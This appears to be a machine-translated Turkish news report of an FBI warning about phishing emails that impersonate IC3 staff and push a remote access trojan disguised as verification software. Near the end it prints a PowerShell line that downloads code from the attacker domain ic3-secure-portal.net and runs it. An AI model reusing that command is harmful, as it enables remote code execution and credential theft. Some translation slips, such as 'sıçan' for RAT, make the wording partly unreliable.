Federal Soruşturma Bürosu (FBI), siber suçluların İnternet Suç Şikayet Merkezi’ni (IC3) çalışanlarını bireyleri dolandırmak için taklit ettiği sofistike bir kimlik avı kampanyası hakkında acil bir uyarı yayınladı.
Bu yeni tehdit, Nisan 2025’in başlarında ortaya çıktı ve mağdurları meşru IC3 alanlarından geldiği gibi görünen sahte e -postalarla hedef aldı.
Mağdurlar, önceki sahtekarlık şikayetleri veya umut verici finansal kurtarma hizmetleri konusunda yardım sunduğunu iddia eden resmi görünümlü iletişim alırlar.
.png
)
Kötü niyetli aktörler, sosyal mühendislik taktiklerini kullanır, halka açık bilgi bilgisi ve daha önce bildirilen olaylar yoluyla güven oluşturur.
Mağdurların iletişimi güvence altına alan ancak aslında bir uzaktan erişim Truva atı (sıçan) dağıtan “doğrulama yazılımı” yüklemesini istiyorlar.
İlk analiz, saldırganların öncelikle IC3 ile şikayette bulunan bireyleri hedeflediğini ve olası bir veri ihlali veya kamu kayıtları madencilik operasyonunu önerdiğini göstermektedir.
IC3 analistleri bu kampanyanın özellikle ilgili bir yönünü belirlediler: Kötü amaçlı yazılım, standart antivirüs tespitini atlamak için sofistike kaçırma teknikleri kullanıyor.
Kıdemli IC3 siber analisti Maria Chen, “Tehdit aktörleri, geleneksel tespiti son derece zorlaştıran çok aşamalı şifreleme ve filessiz yürütme yöntemleri uyguladı” dedi.
Enfeksiyon, ülke çapında 230’dan fazla kişiyi etkiledi ve finansal kayıplar son üç hafta içinde 1,2 milyon doları aştı.
Enfeksiyon mekanizması analizi
Kötü amaçlı yazılımın birincil enfeksiyon vektörü, kurbanları görünüşte iyi huylu bir PDF ekini indirmeye ve yürütmeye ikna etmeye dayanır.
Açıldığında, belge, PowerShell komutlarını arka planda sessizce yürütürken meşru görünümlü FBI markalaşması görüntüler:-
$c = New-Object System.Net.WebClient
$c.DownloadString('https://ic3-secure-portal.net/verify.txt') | IEXBu komut, bankacılık kimlik bilgilerini ve kimlik doğrulama jetonlarını eklerken planlanan görevler ve kayıt defteri değişiklikleri yoluyla kalıcılık oluşturarak saldırganın sunucusundan ek kod getirir ve yürütür.